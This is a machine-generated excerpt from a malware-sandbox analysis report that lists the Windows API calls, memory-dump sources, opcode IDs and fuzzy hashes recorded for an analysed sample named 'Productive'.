                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 666041331-0
                                                                                                                                                                • Opcode ID: 0eacdb29e4f3e2d3cd65c1cf694a56f4b21c62a5b8f23dd0848191562c9dcad6
                                                                                                                                                                • Instruction ID: 6bdc1cfffbeb3ee11a2dcfbb17f627b0dbec0771e30bd796beb71ef982364fe3
                                                                                                                                                                • Opcode Fuzzy Hash: 0eacdb29e4f3e2d3cd65c1cf694a56f4b21c62a5b8f23dd0848191562c9dcad6
                                                                                                                                                                • Instruction Fuzzy Hash: A0516739A00219DFCB01EFA8D8869ADB7F4FF09310B05C169E915AB352DB31AD56CF91
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00312A4A
                                                                                                                                                                • IsMenu.USER32(00000000), ref: 00312A6A
                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00312A9E
                                                                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00312AFC
                                                                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00312B2D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 93392585-0
                                                                                                                                                                • Opcode ID: 1e88a95ab179aa20f31cdd09b24bd98f96b257dcdd9f7265a8422637bc4eaf2e
                                                                                                                                                                • Instruction ID: cceb31ca1352fb1b89f58903337c4e98b23613f20d2ff2acc1b824c29af6f6c4
                                                                                                                                                                • Opcode Fuzzy Hash: 1e88a95ab179aa20f31cdd09b24bd98f96b257dcdd9f7265a8422637bc4eaf2e
                                                                                                                                                                • Instruction Fuzzy Hash: 71519070604249DFDF2ACF68D888AEFBBF8EF4D314F108159E8119B291DB7099A4CB51
                                                                                                                                                                APIs
                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0031EC62
                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0031EC8B
                                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0031ECCA
                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0031ECEF
                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0031ECF7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2832842796-0
                                                                                                                                                                • Opcode ID: 78effd4992181c59c22bfcdab18bdcf21fbc887924fe23bc4215f3f1f853eced
                                                                                                                                                                • Instruction ID: 6cb44667d567cac5b9a1787756a387afe9c4304c6a9cf986a47c7966267b75aa
                                                                                                                                                                • Opcode Fuzzy Hash: 78effd4992181c59c22bfcdab18bdcf21fbc887924fe23bc4215f3f1f853eced
                                                                                                                                                                • Instruction Fuzzy Hash: 58514835A10105EFCB05EF64C985AAEBBF5EF09314B148499E849AB3A2CB31ED61CF50
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 97f09542722633c3fd09f9518c836e9b1f3bb31df01f3ea0a6e42c04d874f880
                                                                                                                                                                • Instruction ID: 1a7cb4521044a4d586abfd51e1e547f3b5698f076df49eb2b97715f215a409a4
                                                                                                                                                                • Opcode Fuzzy Hash: 97f09542722633c3fd09f9518c836e9b1f3bb31df01f3ea0a6e42c04d874f880
                                                                                                                                                                • Instruction Fuzzy Hash: 6D412835900514BFD726CFA4CCC8FA9BBB8EB0A350F160255F99AA72D1C730AD41DB51
                                                                                                                                                                APIs
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 002B2727
                                                                                                                                                                • ScreenToClient.USER32(003777B0,?), ref: 002B2744
                                                                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 002B2769
                                                                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 002B2777
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4210589936-0
                                                                                                                                                                • Opcode ID: 4fd9a333564ab3f90ff29dbd6a761eeca0aeac85bf476c97068f2937205db3c2
                                                                                                                                                                • Instruction ID: ee935eff638eec828090fc00d8606f8633a06c2cd4bbe1e24ab4dadaa21b2bb7
                                                                                                                                                                • Opcode Fuzzy Hash: 4fd9a333564ab3f90ff29dbd6a761eeca0aeac85bf476c97068f2937205db3c2
                                                                                                                                                                • Instruction Fuzzy Hash: E341B63551420AFFCF159FA5C844AE9FB74FB06364F608355F82496290CB30AD65EF90
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 003095E8
                                                                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00309692
                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0030969A
                                                                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 003096A8
                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003096B0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3382505437-0
                                                                                                                                                                • Opcode ID: f87b432336488a3b4c9ca7f6202129641231ae137a0623dc5854efaf04316c1d
                                                                                                                                                                • Instruction ID: 71e5deaf1c9272bd7750aeb234d84e9ba6cf231391d61b37ae082a485b9a2088
                                                                                                                                                                • Opcode Fuzzy Hash: f87b432336488a3b4c9ca7f6202129641231ae137a0623dc5854efaf04316c1d
                                                                                                                                                                • Instruction Fuzzy Hash: CE310E31A0021DEFDB04CF68D94CB9E7BB9FB45325F11421AF925AB2D1C7B1A920CB90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0033B804
                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0033B829
                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0033B841
                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0033B86A
                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0032155C,00000000), ref: 0033B888
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2294984445-0
                                                                                                                                                                • Opcode ID: 4c79efb146245d314c276fb085311b9bb28c6a4f054cf399833fe3922139ce3c
                                                                                                                                                                • Instruction ID: 68ab22a4e4d5512b5c0eac56e834a450aa3d11130f33d6859b5a33c2ef2a5859
                                                                                                                                                                • Opcode Fuzzy Hash: 4c79efb146245d314c276fb085311b9bb28c6a4f054cf399833fe3922139ce3c
                                                                                                                                                                • Instruction Fuzzy Hash: 45219131A14265AFCB269F38CC48A6A77A8FF05321F114728FA25DA1E0D7309950CB90
                                                                                                                                                                APIs
                                                                                                                                                                • DecodePointer.KERNEL32(?,00000000,00000000,?,?,002D2E95,002EB7EA,0036CB50), ref: 002D2ECB
                                                                                                                                                                • DecodePointer.KERNEL32(?,?,002D2E95,002EB7EA,0036CB50), ref: 002D2ED6
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,002D2E95,002EB7EA,0036CB50), ref: 002D2F3D
                                                                                                                                                                • EncodePointer.KERNEL32(002EB7EA,?,?,002D2E95,002EB7EA,0036CB50), ref: 002D2F4B
                                                                                                                                                                • EncodePointer.KERNEL32(00000004,?,?,002D2E95,002EB7EA,0036CB50), ref: 002D2F57
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$Encode$Decode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1898114064-0
                                                                                                                                                                • Opcode ID: 469c0069aa7955fb260924ab67c634693441a32d29629f4d557904e5031f3dfe
                                                                                                                                                                • Instruction ID: 99a5586b65848f349678bf33779fdfd964bc7d0a1e2177ee188c8a90225d89c6
                                                                                                                                                                • Opcode Fuzzy Hash: 469c0069aa7955fb260924ab67c634693441a32d29629f4d557904e5031f3dfe
                                                                                                                                                                • Instruction Fuzzy Hash: 9611AF76624316EF9B259F34EC809AA7BBDEB15350B10092BF805C7721EB30EC548B90
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00326159
                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00326170
                                                                                                                                                                • GetDC.USER32(00000000), ref: 003261AC
                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 003261B8
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 003261F3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                                • Opcode ID: 69ababa5acda9a22e8e52cb9892b809e3c26acfb3c4cb9861cddaaa92a0920ac
                                                                                                                                                                • Instruction ID: 8ac91623d78ce455d8d895fe46ac801faa728e39b4f0cc96b54bd5fa385da185
                                                                                                                                                                • Opcode Fuzzy Hash: 69ababa5acda9a22e8e52cb9892b809e3c26acfb3c4cb9861cddaaa92a0920ac
                                                                                                                                                                • Instruction Fuzzy Hash: CB21D135A00214AFD705EF64DC84AAABBF8EF89300F008478E94A8B212CB30BC10CB90
                                                                                                                                                                APIs
                                                                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002B1729
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 002B1738
                                                                                                                                                                • BeginPath.GDI32(?), ref: 002B174F
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 002B1778
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3225163088-0
                                                                                                                                                                • Opcode ID: 4cd893f0d92295dac7f635895bc2151e4194f207e7475f80095e41e6195d35a0
                                                                                                                                                                • Instruction ID: 06775fc8f522d9a95e542fa7a4d25cd3b275e3c3f2143e5a293dbc3772ef042c
                                                                                                                                                                • Opcode Fuzzy Hash: 4cd893f0d92295dac7f635895bc2151e4194f207e7475f80095e41e6195d35a0
                                                                                                                                                                • Instruction Fuzzy Hash: 2D21C130924309FBDB228F64DC09BE97BACFB01351F544229F819961A1DB7098F1DF82
                                                                                                                                                                APIs
                                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00308E3C
                                                                                                                                                                • GetLastError.KERNEL32(?,00308900,?,?,?), ref: 00308E46
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00308900,?,?,?), ref: 00308E55
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00308900,?,?,?), ref: 00308E5C
                                                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00308E73
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 842720411-0
                                                                                                                                                                • Opcode ID: 8dfc97fb509671374c0852ad0912765db308d218bb169dd0eb9e820560505f27
                                                                                                                                                                • Instruction ID: ad3e0eb3c449be924f345de7d6ee95bdd36f1479b6318b86a44cd63eb0e3589e
                                                                                                                                                                • Opcode Fuzzy Hash: 8dfc97fb509671374c0852ad0912765db308d218bb169dd0eb9e820560505f27
                                                                                                                                                                • Instruction Fuzzy Hash: 0F016D78301204BFDB264FA5DC48D6B7FADEF8A754B110529FA89C7260DE31AC10CAA0
                                                                                                                                                                APIs
                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?,?,?,00308073), ref: 00307D45
                                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?,?), ref: 00307D60
                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?,?), ref: 00307D6E
                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?), ref: 00307D7E
                                                                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307C62,80070057,?,?), ref: 00307D8A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3897988419-0
                                                                                                                                                                • Opcode ID: 16ed834784eb864234b848f33146e5d3357045ef94215d2b54e53a36f80e66dd
                                                                                                                                                                • Instruction ID: 58c24a98b15fa5381df646cc21e613995a190c304fe405dd0ef4da4ba8a949f0
                                                                                                                                                                • Opcode Fuzzy Hash: 16ed834784eb864234b848f33146e5d3357045ef94215d2b54e53a36f80e66dd
                                                                                                                                                                • Instruction Fuzzy Hash: EE01717AA06214BBDB124F64DD44BAA7BADEF45751F144014FD08D6250DB71FD00CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00308CDE
                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00308CE8
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00308CF7
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00308CFE
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00308D14
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                                • Opcode ID: 41840b65191623c9159997545a694adaf809ae166d643f0d2ef347a0f9dc4fff
                                                                                                                                                                • Instruction ID: f90399983ddee62827660fc7cb0a8c9a7ffbc39527c5a1a6342ec55ac50708b4
                                                                                                                                                                • Opcode Fuzzy Hash: 41840b65191623c9159997545a694adaf809ae166d643f0d2ef347a0f9dc4fff
                                                                                                                                                                • Instruction Fuzzy Hash: 32F04F39301204BFEF260FA59C89E6B3BADEF5A754F104525FA45CA1A0CE71AC41DB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00308D3F
                                                                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00308D49
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00308D58
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00308D5F
                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00308D75
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                                • Opcode ID: 5a13fd3fdafea2ed4e3887b9b51d55f619c63eb74b197f7ae846f01709f5d89d
                                                                                                                                                                • Instruction ID: ce1ef9dd6ef3cbd721d7e30d8b5c81cf8513017a13f4aa2ca1c3ea3cf481f16f
                                                                                                                                                                • Opcode Fuzzy Hash: 5a13fd3fdafea2ed4e3887b9b51d55f619c63eb74b197f7ae846f01709f5d89d
                                                                                                                                                                • Instruction Fuzzy Hash: D6F0A438201204AFD7220FA4DC98F6B3B6CEF46754F040615FA44C61A0CF70AD00DB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0030CD90
                                                                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0030CDA7
                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 0030CDBF
                                                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 0030CDDB
                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0030CDF5
